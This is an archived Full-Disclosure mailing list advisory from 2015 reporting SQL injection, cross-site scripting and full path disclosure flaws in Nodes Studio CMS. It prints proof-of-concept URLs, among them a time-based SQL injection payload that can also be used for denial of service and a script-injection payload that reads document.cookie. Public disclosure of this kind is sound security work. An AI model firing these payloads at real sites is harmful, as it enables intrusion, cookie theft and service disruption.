| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <005b01d0784d$1a4838a0$9b7a6fd5@pc> Date: Thu, 16 Apr 2015 16:55:31 +0300 From: "MustLive" <mustlive@...security.com.ua> To: <submissions@...ketstormsecurity.org>, <fulldisclosure@...lists.org> Subject: [FD] SQL Injection, XSS and FPD vulnerabilities Nodes Studio CMS Hello list! There are SQL Injection, Cross-Site Scripting and Full Path Disclosure vulnerabilities in Nodes Studio CMS. This is Russian commercial CMS, which I found at one site of Russian terrorists and propagandists. ------------------------- Affected vendors: ------------------------- Nodes Studio. ------------------------- Affected products: ------------------------- Vulnerable are all versions of Nodes Studio CMS. ---------- Details: ---------- SQL Injection (WASC-19): http://site/news/%22%20or%20benchmark(10000000,md5(now()))%3E0%23 There are filtration in the system of keywords (such as from) to protect against SQLi attacks. But it can be bypassed with using special technique or one can conduct DoS attack via SQLi. Cross-Site Scripting (WASC-08): http://site/news/%22%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E Full Path Disclosure (WASC-13): http://site/news/%22%201 I mentioned about these vulnerabilities at my site (http://websecurity.com.ua/7694/). Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists